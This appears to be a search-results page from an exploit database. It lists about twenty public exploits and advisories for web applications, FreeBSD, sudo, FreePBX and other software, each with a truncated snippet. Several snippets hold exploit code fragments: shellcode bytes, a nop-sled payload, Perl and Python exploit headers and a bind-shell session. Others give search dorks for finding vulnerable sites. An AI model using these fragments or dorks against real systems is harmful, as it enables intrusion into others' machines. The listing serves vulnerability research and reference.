11967 matches found
File 3.x Local Stack Overflow Code Execution Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/7008/info It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoki...
FreeBSD <= 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit
No description provided by source. /FreeBSD = 5.4-RELEASE ftpd Version 6.00LS sendfile kernel mem-leak by Kingcope February 2011 -- kernel memory file may contain secret hashes and more.. tested on FreeBSD 5.3-RELEASE reference: FreeBSD-SA-05:02.sendfile / include stdio.h include stdlib.h include...
AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /\ \L\ /\ /\ \ \ \ \ \ \ / /\ \L\ \ | | \ \ \ \\ \ \ /\ \\ \\ /\ \...
Tastydir <= 1.2 (1216) Multiple Vulnerabilities
No description provided by source. Exploit Title: Tastydir = 1216 folder creation vuln Date: Oct 17 2010 Author: R Software Link: http://codecanyon.net/item/tastydir-an-ajax-file-manager-and-dir-listing/117167 Version: 1216 Tested on: Ubuntu 10.10 Information: Tastydir is a cross-platform PHP fil...
work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability
No description provided by source. Rodrigo Duarte WuefezAT2die4.com ;D WORK system e-commerce: WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow, content,package,language,currency,country,price,stock,group user,CSS,banner,logo,...
TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit
No description provided by source. tinyidentd exploit code by thomas . pollet at gmail . com bug by Maarten Boone usage: python exploit.py target import socket,sys jmp into nop sled payload = '\xeb\x20' ident crap payload += ', 28 : USERID : UNIX : ' nop sled payload +='XXXX' jmp %esi payload +=...
SmodCMS 4.07 (fckeditor) - Remote Arbitrary File Upload Exploit
No description provided by source. ?php / ----------------------------------------------------------------- SmodCMS v.4.07 fckeditor Remote Arbitrary File Upload Exploit -----------------------------------------------------------------...
PhpShop Core <= 0.9.0 RC1 (PS_BASE) File Include Vulnerabilities
No description provided by source. --------------------------------------|| Viva Palestine ||----------------------------------------- PhpShop-Core append.php Remot File Include Vulnerability Found By : CoLd Zero Wasem898 Source : includeonce $4AZHARTeAM.Securty.; PalesTine Arab Muslim Hacker's...
ITA Forum <= 1.49 SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; ITA Forum 1.49 sql injection exploit with one char bruteforce by 1dt.w0lf // r57 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: example: r57ita.pl http://127.0.0.1/ITA...
AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - AES: AlberT-EasySite = 1.0a5 Remote File Include Vulnerability + + + - Script name: AES: AlberT-EasySite v. 1.0a5 - Script site:...
linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
No description provided by source. / $Id: where-is-wallie.c, v 1.0 2010/04/24 18:32:29 condis Exp $ linux/x86 sends Phuck3d! to all terminals 60 bytes shellcode by condis Tested on: Linux Debian / int mainvoid char evil = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx...
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
No description provided by source. ?php / Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1\n telnet 192.168.2.32 4444 Microsoft Windows XP Version 5.1.2600 C Copyright 1985-2001 Microsoft Corp. C:\apache 7ffdf020 7c911005...
real estate web site 1.0 (sql/xss) Multiple Vulnerabilities
No description provided by source. --==+=================== Spanish Hackers Team www.spanish-hackers.com =================+==-- --==+ Real Estate Web Site 1.0 SQL/XSS Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==...
sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass
No description provided by source. / death-star.c sudo v1.8.0-1.8.3p1 sudodebug format string root exploit + glibc FORTIFYSOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFYSOURCE format string protection bypass via nargs integer overflow -...
ml2 - local users can crash processes
No description provided by source. include stdio.h include unistd.h include stdlib.h include syslog.h error int mainint argc, char argv char foo1000; char bigmsg10000; char s, holds; int i = 0; memsetbigmsg, 'X', sizeofbigmsg-1; if argc 2 printfusage: %s pid to kill\n, argv0; exit1; // fork;...
DMXReady Classified Listings Manager <= 1.1 - SQL Injection Vulnerability
No description provided by source. Title : DMXReady Classified Listings Manager = 1.1 SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.dmxready.com $$ : 99.97 $ Dork : inurl:incclassifiedlistingsmanager.asp DorkEx :...
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit
No description provided by source. !/usr/bin/python Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit Google Dork: oy vey Date: March 23rd, 2012 Author: muts Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. Tested on: multiple CVE : notyet Blog post :...
WvTFTPd 0.9 - Remote Root Heap Overflow Exploit
No description provided by source. / wvtftp option name heap overflow remote root exploit infamous42md AT hotpop DOT com exploitation is not exactly straight forward. When we overflow our buffer, we overwrite a pointer that is freed before we get to trigger our overwrite. so we have to restore th...
Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability
No description provided by source. Joomla Component idoblog Remote SQL Injection Founded by : His0k4 Algerian HaCkeR; Contact: His0k4.hlmatgmail.com Greetz : All friends & muslims HaCkeRs : Greetz2 : http://www.palcastle.org/cc/ ScriptName: Joomla ComponentName: comidoblog DORK: inurl:comidoblog...
Joomla Component JQuarks4s 1.0.0 - Blind SQL Injection Vulnerability
No description provided by source. JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability Name JQuarks4s Vendor http://www.iptechinside.com/labs/projects/listfiles/jquarks-for-surveys Versions Affected 1.0.0 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net...